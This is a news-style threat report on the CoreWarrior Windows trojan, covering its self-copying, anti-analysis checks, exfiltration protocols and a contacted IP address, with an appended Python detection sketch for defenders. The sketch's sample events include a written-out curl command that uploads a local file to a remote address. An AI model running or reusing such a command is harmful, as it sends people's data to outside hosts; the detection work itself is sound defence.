Corewarrior: Trojan Horse Supercharges Windows Threat

SonicWall researchers have identified a surge in a persistent trojan known as CoreWarrior, which is spreading rapidly. The malware can create dozens of copies of itself and connect to multiple IP addresses, creating weaknesses in the Windows user interface.

The CoreWarrior trojan is distributed as an executable file packed with UPX, which makes it harder to unpack with standard tools. On execution, the program generates copies of itself with random names and uses the command line to send data to a remote server via curl. It continuously creates and deletes copies, and can produce more than a hundred of them within just 10 minutes.

During its operation, CoreWarrior opens listening ports within specific ranges and has been observed connecting to the IP address 172.67.183.40, although no active TCP/UDP traffic was detected.

The trojan is equipped with anti-analysis mechanisms, including anti-debugging based on RDTSC execution-timing checks, random sleep timers, and virtual-environment detection by checking for Hyper-V. Additionally, the malware supports the FTP, SMTP, and POP3 protocols for data exfiltration.
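As an added illustration (not SonicWall's detection logic and not code from the report), the following Python sketch turns two of the behaviours described above into a simple detection over constructed Sysmon-style events: a burst of randomly named executable copies written by one process inside a short window, followed by a curl upload launched from the command line by that same process. The event format, the thresholds and all sample paths and addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style events for illustration only (not real telemetry).
# Tuple: (UTC timestamp, event type, source process image, target). For
# FileCreate the target is the file written; for ProcessCreate it is the
# child's command line. 198.51.100.7 is a documentation address, not an IoC.
SAMPLE_EVENTS = [
    ("2024-11-14T10:00:01", "FileCreate", r"C:\Temp\dropper.exe", r"C:\Temp\x7qk2pz9.exe"),
    ("2024-11-14T10:00:04", "FileCreate", r"C:\Temp\dropper.exe", r"C:\Temp\m3vtb8ql.exe"),
    ("2024-11-14T10:00:09", "FileCreate", r"C:\Temp\dropper.exe", r"C:\Temp\a9wz41cd.exe"),
    ("2024-11-14T10:00:15", "FileCreate", r"C:\Temp\dropper.exe", r"C:\Temp\pq02nv7e.exe"),
    ("2024-11-14T10:00:20", "FileCreate", r"C:\Temp\dropper.exe", r"C:\Temp\uy6hs3kr.exe"),
    ("2024-11-14T10:00:25", "ProcessCreate", r"C:\Temp\dropper.exe",
     r"cmd.exe /c curl -s -F data=@C:\Temp\out.txt http://198.51.100.7/up"),
    ("2024-11-14T10:05:00", "FileCreate", r"C:\Installer\setup.exe", r"C:\Program Files\App\app.exe"),
]

# Heuristic for "random" base names: 6-12 lowercase alphanumerics mixing letters and digits.
RANDOM_NAME = re.compile(r"^(?=.*\d)(?=.*[a-z])[a-z0-9]{6,12}$")

def base_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].rsplit(".", 1)[0]

def burst_replicators(events, window=timedelta(seconds=60), threshold=5):
    """Processes that wrote >= threshold distinct randomly named .exe files
    within any `window`: the copy-flood behaviour described in the report."""
    writes = defaultdict(list)
    for ts, kind, proc, target in events:
        if kind == "FileCreate" and target.lower().endswith(".exe") \
                and RANDOM_NAME.match(base_name(target).lower()):
            writes[proc].append((datetime.fromisoformat(ts), target))
    flagged = set()
    for proc, items in writes.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            names = {p for t, p in items[i:] if t - t0 <= window}
            if len(names) >= threshold:
                flagged.add(proc)
                break
    return flagged

def curl_launches(events):
    """(parent, command line) pairs where a process launched curl via the command line."""
    return [(proc, target) for _, kind, proc, target in events
            if kind == "ProcessCreate" and re.search(r"\bcurl(\.exe)?\b", target, re.I)]

def analyze(events):
    """Correlate both signals: curl launched by a process already flagged as a replicator."""
    flagged = burst_replicators(events)
    beacons = [b for b in curl_launches(events) if b[0] in flagged]
    return {"replicators": sorted(flagged), "curl_from_replicator": beacons}
```

The installer event is deliberately present to show that a single, normally named executable write does not trip the rule; tune the window and threshold to the host's baseline before deploying anything like this.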

SonicWall has promptly released signatures to protect users from the CoreWarrior trojan, and other antivirus vendors are expected to follow soon. To guard against potential attacks, users are advised to keep their security software, and its signature database, up to date.
